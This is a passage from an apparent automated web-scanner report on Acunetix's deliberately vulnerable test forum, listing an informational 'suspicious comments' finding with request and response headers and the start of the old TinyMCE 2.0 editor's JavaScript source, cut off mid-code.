InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 6 |
| Solution | |
| Reference | http://projects.webappsec.org/Fingerprinting |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 45 |
| Plugin Id | 90027 |
|
Informational |
Information Disclosure - Suspicious Comments |
|---|---|
| Description |
The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.
|
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | query |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return 